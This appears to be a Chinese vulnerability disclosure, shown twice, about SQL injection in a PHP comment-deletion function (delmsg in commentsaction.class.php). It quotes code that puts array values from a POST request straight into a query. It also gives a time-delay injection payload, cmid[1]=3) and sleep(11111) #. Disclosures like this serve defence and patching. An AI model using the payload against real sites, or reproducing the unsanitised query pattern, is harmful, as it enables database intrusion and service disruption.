VULHUB ™

### 简要描述： 过滤不严造成注入 ### 详细说明： 问题出现在 upload\Home\Lib\Action\commentsaction.class.php ``` public function delmsg() { $cmid=$_POST['cmid']; if (is_array($cmid)) { $cids=implode(',',$cmid); M('Comments')->where("comment_id IN ($cids) AND (user_id='".$this->my['user_id']."' OR comment_uid='".$this->my['user_id']."')")->delete(); } else if (is_numeric($cmid)) { M('Comments')->where("comment_id='$cmid' AND (user_id='".$this->my['user_id']."' OR comment_uid='".$this->my['user_id']."')")->delete(); } echo json_encode(array("ret"=>'success',"tip"=>L('del_comment_success'))); } ``` [<img src="https://images.seebug.org/upload/201402/10133016291cb7283986a54026852452d06dca23.png" alt=".png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201402/10133016291cb7283986a54026852452d06dca23.png) 简单利用代码 如下 cmid[1]=3) and sleep(11111) # 时间延迟注入 ### 漏洞证明： 如上所示

### 简要描述： 过滤不严造成注入 ### 详细说明： 问题出现在 upload\Home\Lib\Action\commentsaction.class.php ``` public function delmsg() { $cmid=$_POST['cmid']; if (is_array($cmid)) { $cids=implode(',',$cmid); M('Comments')->where("comment_id IN ($cids) AND (user_id='".$this->my['user_id']."' OR comment_uid='".$this->my['user_id']."')")->delete(); } else if (is_numeric($cmid)) { M('Comments')->where("comment_id='$cmid' AND (user_id='".$this->my['user_id']."' OR comment_uid='".$this->my['user_id']."')")->delete(); } echo json_encode(array("ret"=>'success',"tip"=>L('del_comment_success'))); } ``` [<img src="https://images.seebug.org/upload/201402/10133016291cb7283986a54026852452d06dca23.png" alt=".png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201402/10133016291cb7283986a54026852452d06dca23.png) 简单利用代码 如下 cmid[1]=3) and sleep(11111) # 时间延迟注入 ### 漏洞证明： 如上所示